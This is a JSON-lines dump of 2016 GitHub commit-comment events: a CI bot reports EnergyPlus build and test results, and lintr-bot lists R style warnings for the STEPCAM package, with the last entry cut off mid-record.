{"id":"4595841587","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19112578,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T12:13:15Z","updated_at":"2016-09-21T12:13:15Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2373 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T12:13:15Z"}
{"id":"4595842931","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19112598,"position":null,"line":null,"path":null,"commit_id":"4711a0d516fc6305eb0969fa95384e2005ccf507","created_at":"2016-09-21T12:13:31Z","updated_at":"2016-09-21T12:13:31Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:79:60:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:85:52:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L85) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:89:10:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:89:10:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L89) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:21:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:26:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:7:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L120) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:120:10:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:23:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L120) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:120:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:5:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:28:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:28:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L143) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:12:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:30:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:155:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L155) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:155:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L155) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L159) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:169:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L169) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:173:40:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L173) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:173:53:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L173) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:179:20:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:50:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:180:64:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:181:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:183:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L183) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:185:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L185) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:187:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L187) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:196:69:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:200:72:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L200) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L204) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:207:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:14:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:24:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:24:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:9:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:27:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L225) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:225:14:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:34:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:21:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L232) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:232:22:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:234:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:38:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:64:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L257) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:258:33:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:56:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:261:27:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:261:27:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:20:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:274:61:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:278:40:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L278) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:279:57:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             